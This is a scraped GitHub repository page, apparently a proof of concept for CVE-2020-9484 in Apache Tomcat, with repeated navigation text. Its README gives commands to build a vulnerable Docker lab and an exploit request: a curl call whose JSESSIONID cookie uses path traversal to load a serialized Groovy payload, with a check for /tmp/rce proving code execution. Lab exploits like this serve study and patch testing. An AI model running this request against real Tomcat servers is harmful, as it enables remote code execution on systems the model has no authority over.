CVE-2020-9484 (Tomcat)

For educational purposes only.

See Reference for the details.

Run

$ git clone https://github.com/masahiro331/CVE-2020-9484.git
$ cd CVE-2020-9484
$ docker build -t tomcat:groovy .
$ docker run -d -p 8080:8080 tomcat:groovy

Exploit

$ curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy'

Check

$ docker exec -it $CONTAINER /bin/sh
$ ls /tmp/rce

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
Dockerfile		Dockerfile
README.md		README.md
context.xml		context.xml
groovy-2.3.9.jar		groovy-2.3.9.jar
groovy.session		groovy.session
index.jsp		index.jsp

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Dockerfile

Dockerfile

README.md

README.md

context.xml

context.xml

groovy-2.3.9.jar

groovy-2.3.9.jar

groovy.session

groovy.session

index.jsp

index.jsp

Repository files navigation

CVE-2020-9484 (Tomcat)

Run

Exploit

Check

About

Releases

Packages

Languages

cxzero/CVE-2020-9484

Folders and files

Latest commit

History

Repository files navigation

CVE-2020-9484 (Tomcat)

Run

Exploit

Check

About

Resources

Stars

Watchers

Forks

Languages